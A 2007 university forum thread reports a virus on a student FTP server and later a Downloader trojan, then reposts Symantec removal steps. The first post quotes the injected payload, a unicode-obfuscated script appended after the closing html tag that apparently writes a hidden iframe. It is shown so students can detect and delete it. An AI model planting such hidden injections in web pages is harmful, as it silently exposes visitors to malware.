Welcome! Log In Create A New Profile

Advanced

Virus on osprey

Posted by TvD 
Announcements Last Post
Announcement SoC Curricula 09/30/2017 01:08PM
Announcement Demarcation or scoping of examinations and assessment 02/13/2017 07:59AM
Announcement School of Computing Short Learning Programmes 11/24/2014 08:37AM
Announcement Unisa contact information 07/28/2011 01:28PM
TvD
Virus on osprey
August 13, 2007 10:08AM
On the 8th of August a virus was downloaded onto the osprey ftp server - it has now been cleaned but it could come back as it was transmitted from someone's windows pc.

To check for the virus examine your index.htm or index.html file (it only attaches to these two names) and see if at the end of the html file (after the </html> the following appears:

<!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\----------->u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e'winking smiley</script><!-- c65 -->

If it is there delete that part.

To prevent the virus infecting your html files on osprey do not use index.htm or index.html for your file names


TvD
Re: Virus on osprey
October 18, 2007 01:44PM
Toby
there is still a virus on the FTP server, the one that I got today is called downloader, that connects to the internet and downloads Trojans or components,

the problem is that it places itself so that when your computer restores your system files it reinstalls itself again, so you actually have to disable the system restore function before scanning and deleting the virus from all files (usually scans don't include the system restore files) in a regular virus scan it would not be detected.

see, http://symantec.com/security_response/index.jsp for a proper explanation and how to get rid of it.

Nici
TvD
Re: Virus on osprey
October 18, 2007 01:53PM
yes I know Nici - unfortunately the Virus scanner on osprey does not recognize the virus - it comes back even when I clean the JavaScript shown above from the index.htm and index.html files

That is why I suggested that you do not use those two names for your project files

I suppose a better solution would be to get your ISP to host your files
Re: Virus on osprey
October 18, 2007 03:42PM
well for those hapless souls like myself that find themselves infected, I post the following;

REMOVAL

The following instructions pertain to all current and recent Symantec antivirus products, including the Symantec AntiVirus and Norton AntiVirus product lines.

1. Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Restart the computer in Safe mode (Windows 95/98/Me/2000/XP) or VGA mode (Windows NT).
4. Run a full system scan and delete all the files detected as Downloader.
5. Clear Internet Explorer History and files, if needed.


For specific details on each of these steps, read the following instructions.

1. Disabling System Restore (Windows Me/XP)
If you are running Windows Me or Windows XP, we recommend that you temporarily turn off System Restore. Windows Me/XP uses this feature, which is enabled by default, to restore the files on your computer in case they become damaged. If a virus, worm, or Trojan infects a computer, System Restore may back up the virus, worm, or Trojan on the computer.

Windows prevents outside programs, including antivirus programs, from modifying System Restore. Therefore, antivirus programs or tools cannot remove threats in the System Restore folder. As a result, System Restore has the potential of restoring an infected file on your computer, even after you have cleaned the infected files from all the other locations.

Also, a virus scan may detect a threat in the System Restore folder even though you have removed the threat.

For instructions on how to turn off System Restore, read your Windows documentation, or one of the following articles:

* "How to disable or enable Windows Me System Restore"
* "How to turn off or turn on Windows XP System Restore"


For additional information, and an alternative to disabling Windows Me System Restore, see the Microsoft Knowledge Base article, "Antivirus Tools Cannot Clean Infected Files in the _Restore Folder," Article ID: Q263455.

2. Updating the virus definitions
Symantec Security Response fully tests all the virus definitions for quality assurance before they are posted to our servers. There are two ways to obtain the most recent virus definitions:

* Running LiveUpdate, which is the easiest way to obtain virus definitions: These virus definitions are posted to the LiveUpdate servers once each week (usually on Wednesdays), unless there is a major virus outbreak. To determine whether definitions for this threat are available by LiveUpdate, refer to the Virus Definitions (LiveUpdate).
* Downloading the definitions using the Intelligent Updater: The Intelligent Updater virus definitions are posted on U.S. business days (Monday through Friday). You should download the definitions from the Symantec Security Response Web site and manually install them. To determine whether definitions for this threat are available by the Intelligent Updater, refer to the Virus Definitions (Intelligent Updater).

The Intelligent Updater virus definitions are available: Read "How to update virus definition files using the Intelligent Updater" for detailed instructions.


3. Restarting the computer in Safe mode or VGA mode

* For Windows 95, 98, Me, 2000, or XP users, restart the computer in Safe mode. For instructions, refer to the document, "How to start the computer in Safe Mode."
* For Windows NT 4 users, restart the computer in VGA mode.



4. Scanning for and deleting the infected files

1. Start your Symantec antivirus program and make sure that it is configured to scan all the files.
* For Norton AntiVirus consumer products: Read the document, "How to configure Norton AntiVirus to scan all files."
* For Symantec AntiVirus Enterprise products: Read the document, "How to verify that a Symantec Corporate antivirus product is set to scan all files."
2. Run a full system scan.
3. If any files are detected as infected with Downloader, click Delete. If your Symantec antivirus program detects any infected files that it cannot delete, record the location of the file and the file name. Then do one of the following:
* If the file is in a location other than the Temporary Internet Files folder, restart the computer in Safe mode a second time. Then use Windows Explorer, browse to and delete that particular file. Once this is done, restart the computer in Normal mode. For instructions, read the section on returning to Normal mode in the document, "How to start the computer in Safe Mode."
* If the file is in the Temporary Internet Files folder, write down the entire path and file name. Then go on to section 5.


5. Clearing the Temporary Internet Files folder

1. Restart the computer in Normal mode. For instructions, read the section on returning to Normal mode in the document "How to start the computer in Safe Mode."
2. Log onto the computer using the name that was shown in the path that you wrote down in step 4c.

For example, if the path was:

C:\Documents and Settings\Linda\Local Settings\Temporary Internet Files\qrwmqczd.dll

log on to the computer as Linda.

3. Start Internet Explorer.
4. Click the Tools menu > Internet Options.
5. In the Temporary Internet Files section, click the Delete Files button.
6. Check "Delete all offline content," and then click OK.
Sorry, only registered users may post in this forum.

Click here to login